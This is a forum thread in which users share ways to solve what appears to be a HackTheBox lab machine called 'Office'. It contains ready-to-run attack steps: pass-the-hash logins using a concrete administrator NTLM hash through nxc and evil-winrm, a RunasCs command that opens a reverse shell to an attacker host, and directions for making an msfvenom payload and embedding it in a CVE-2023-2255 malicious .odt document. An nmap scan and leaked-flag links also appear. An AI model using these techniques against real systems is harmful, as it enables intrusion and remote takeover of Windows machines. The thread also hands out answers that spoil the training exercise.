Possibly Related Threads…

tetra02 · Feb 24, 2024, 12:43 AM

(Feb 19, 2024, 04:51 PM)balckroot Wrote: One command and get root.txt

nxc winrm <ip>-u 'administrator' -p 'aad3b435b51404eeaad3b435b51404ee:f5b4f1e96c7ffca801ed5832e5e9105d' -x 'type C:\Users\Administrator\Desktop\root.txt'

Thanksss Men :3 I love u

unknown1234 · Feb 24, 2024, 12:53 AM

(Feb 23, 2024, 08:06 PM)max1musgrand1mus Wrote: Hi all, do you know what to do after moving .odt file? coz' I cant get shell for Pots. There no libreoffice to open it, and I didnt put my ip to anyplace in the CVE-2023-2255 exploit file. how does that give me revshell?
thank you for answer in advance!!!

You need to create a revshell.exe (use msfvenum) first and move it to the target machine. Once that’s done. You need to point that revshell file in your odt exploit using the CVE you mentioned earlier.

Make sure you have a listener open (netcat or metasploit) before upload into the app in port 8083

lucid777 · Feb 24, 2024, 03:49 PM

(Feb 18, 2024, 02:05 AM)ConnorDev Wrote:
(Feb 18, 2024, 01:57 AM)chillywilly Wrote: why do that when runascs can do it
RunasCs.exe tstark <password> powershell -r 10.10.x.x:9001

Thanks for that!

Thanks for that too!!

lucid777 · Feb 24, 2024, 05:14 PM

i try to use the CVE-2023-2255 POC, but I have an error that I can't fix. Someone could help me?

$ python CVE-2023-2255.py --cmd "c:\users\public\met.exe" --output lu.odt
Traceback (most recent call last):
File "/media/sf_vmshared/box/CVE-2023-2255.py", line 46, in <module>
main()
File "/media/sf_vmshared/box/CVE-2023-2255.py", line 14, in main
with zipfile.ZipFile("./samples/test.odt", "r") as zip_ref:
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.11/zipfile.py", line 1302, in __init__
self._RealGetContents()
File "/usr/lib/python3.11/zipfile.py", line 1369, in _RealGetContents
raise BadZipFile("File is not a zip file")
zipfile.BadZipFile: File is not a zip file

calisamaa · Feb 24, 2024, 07:10 PM

any help guys?? I got the user flaf from tstark account now I don't know where to go from here.. I have tried chisel but it doesn't work for me to get sql

calisamaa · (This post was last modified: Feb 24, 2024, 09:02 PM by calisamaa.)

Download EvilWinRm From here

then

./evil-winrm -u administrator -p aad3b435b51404eeaad3b435b51404ee:f5b4f1e96c7ffca801ed5832e5e9105d -i 10.10.11.3

go get root at C:\Users\Administrator\Desktop> type root.txt

unknown1234 · Feb 24, 2024, 10:24 PM

(Feb 24, 2024, 05:14 PM)lucid777 Wrote: i try to use the CVE-2023-2255 POC, but I have an error that I can't fix. Someone could help me?

$ python CVE-2023-2255.py --cmd "c:\users\public\met.exe" --output lu.odt
Traceback (most recent call last):
File "/media/sf_vmshared/box/CVE-2023-2255.py", line 46, in <module>
main()
File "/media/sf_vmshared/box/CVE-2023-2255.py", line 14, in main
with zipfile.ZipFile("./samples/test.odt", "r") as zip_ref:
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.11/zipfile.py", line 1302, in __init__
self._RealGetContents()
File "/usr/lib/python3.11/zipfile.py", line 1369, in _RealGetContents
raise BadZipFile("File is not a zip file")
zipfile.BadZipFile: File is not a zip file

Looks like you don’t have the .odt file
In your exploit folder (local machine). Go back the exploit GitHub page and download the ‘./samples/test.odt’ to the same folder and run

blckfnx · Mar 03, 2024, 07:48 AM

thanks for share i have a rooted

Jesta81 · Mar 03, 2024, 05:29 PM

(Feb 17, 2024, 10:57 PM)0xfd9aac Wrote:
(Feb 17, 2024, 10:56 PM)skyfallizhard Wrote: how are y'all getting a shell? i got the tstark creds on my own but then i hit a wall

Exploit admin panel from joomla.

Got password from kerberos hash for Iron Man, but where are you seeing Joomla running on this box? I don't see any web servers?

53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-03-04 01:24:53Z)
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: office.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: office.htb0., Site: Default-First-Site-Name)
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: office.htb0., Site: Default-First-Site-Name)
3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: office.htb0., Site: Default-First-Site-Name)
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
58013/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
61037/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
61044/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
61066/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC

Possibly Related Threads…
Thread		Author	Replies	Views	Last Post
	[FREE] CPTS 12 FLAGS	pulsebreaker	66	1,774	2 hours ago Last Post: vlka
	[FREE] 300+ Writeups PDF HackTheBox/HTB premium retired	Tamarisk	370	92,502	8 hours ago Last Post: lifolifo007
	Hack the box Pro Labs, VIP, VIP+ 1 month free Method	RedBlock	23	2,209	11 hours ago Last Post: kkkato
	[FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags	Techtom	20	2,521	Apr 29, 2026, 11:06 PM Last Post: op334
	[FREE] HackTheBox All Cheatsheets	Tamarisk	3	414	Apr 29, 2026, 10:36 PM Last Post: op334